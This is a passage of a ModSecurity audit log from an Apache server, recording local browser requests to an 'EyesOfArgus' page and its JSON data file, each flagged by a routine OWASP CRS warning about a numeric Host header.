REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4hX8AAQEAABwOGnsAAAAB\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":852,"p2":2085,"p3":90,"p4":547,"p5":100,"sr":52,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:01 --0400","transaction_id":"WRc4hX8AAQEAABwOGnwAAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:57 GMT","ETag":"\"ccc-54f6a91f7e6c1-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4hX8AAQEAABwOGnwAAAAB\"]"],"stopwatch":{"p1":631,"p2":1415,"p3":80,"p4":327,"p5":168,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:04 --0400","transaction_id":"WRc4iH8AAQEAABwOGn0AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:59 GMT","ETag":"\"295-54f6a9212064f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4iH8AAQEAABwOGn0AAAAB\"]"],"stopwatch":{"p1":499,"p2":965,"p3":53,"p4":157,"p5":57,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:05 --0400","transaction_id":"WRc4iX8AAQEAABwOGn4AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4iX8AAQEAABwOGn4AAAAB\"]"],"stopwatch":{"p1":385,"p2":908,"p3":53,"p4":243,"p5":61,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:05 --0400","transaction_id":"WRc4iX8AAQEAABwOGn8AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4iX8AAQEAABwOGn8AAAAB\"]"],"stopwatch":{"p1":407,"p2":825,"p3":44,"p4":346,"p5":47,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:53 --0400","transaction_id":"WRc4uX8AAQEAABwPUrAAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4uX8AAQEAABwPUrAAAAAC\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":697,"p2":1034,"p3":50,"p4":293,"p5":54,"sr":43,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:54 --0400","transaction_id":"WRc4un8AAQEAABwPUrEAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:47:50 GMT","ETag":"\"cca-54f6a951c3ab7-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4un8AAQEAABwPUrEAAAAC\"]"],"stopwatch":{"p1":380,"p2":971,"p3":63,"p4":412,"p5":65,"sr":16,"sw":2,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrIAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:47:51 GMT","ETag":"\"295-54f6a953550a5\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4u38AAQEAABwPUrIAAAAC\"]"],"stopwatch":{"p1":671,"p2":1385,"p3":60,"p4":236,"p5":65,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrMAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4u38AAQEAABwPUrMAAAAC\"]"],"stopwatch":{"p1":601,"p2":1386,"p3":91,"p4":415,"p5":535,"sr":24,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrQAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
